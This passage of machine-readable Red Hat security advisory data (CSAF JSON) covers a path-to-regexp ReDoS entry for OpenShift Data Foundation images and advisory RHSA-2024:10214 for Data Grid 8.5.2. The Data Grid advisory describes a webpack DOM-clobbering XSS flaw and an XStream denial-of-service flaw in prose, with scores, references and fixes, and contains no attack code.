"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
}
]
}
RHSA-2024:10214
Vulnerability from csaf_redhat - Published: 2024-11-25 16:56 - Updated: 2025-11-21 18:54Summary
Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update
Notes
Topic
An update for Red Hat Data Grid 8 is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].
Security Fix(es):
* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)
* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for Red Hat Data Grid 8 is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].\n\nSecurity Fix(es):\n\n* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)\n\n* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:10214",
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2324606",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2324606"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10214.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update",
"tracking": {
"current_release_date": "2025-11-21T18:54:41+00:00",
"generator": {
"date": "2025-11-21T18:54:41+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:10214",
"initial_release_date": "2024-11-25T16:56:04+00:00",
"revision_history": [
{
"date": "2024-11-25T16:56:04+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-11-25T16:56:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T18:54:41+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Data Grid",
"product": {
"name": "Red Hat Data Grid",
"product_id": "Red Hat Data Grid",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_data_grid:8"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Data Grid"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Data Grid"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-11-25T16:56:04+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Data Grid"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Data Grid"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Data Grid"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-47072",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2024-11-08T13:47:39.374198+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2324606"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the XStream library. A remote attacker may trigger a denial of service by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. This issue may lead to the termination of the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in XStream is considered an Important severity rather than Moderate because it exposes applications to a denial of service (DoS) attack with relative ease. By exploiting the flaw in the `BinaryStreamDriver`, an attacker can manipulate the binary input stream to trigger a stack overflow, which terminates the application unexpectedly. Unlike moderate vulnerabilities, which may require specific conditions or limited privileges, this flaw enables remote attackers to forcefully terminate services by crafting malicious input, impacting system availability. Additionally, the vulnerability\u2019s reliance on a common serialization mechanism elevates the risk, as it may affect applications across various environments and industries where XStream is deployed.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Data Grid"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-47072"
},
{
"category": "external",
"summary": "RHBZ#2324606",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2324606"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-47072",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47072"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-47072",
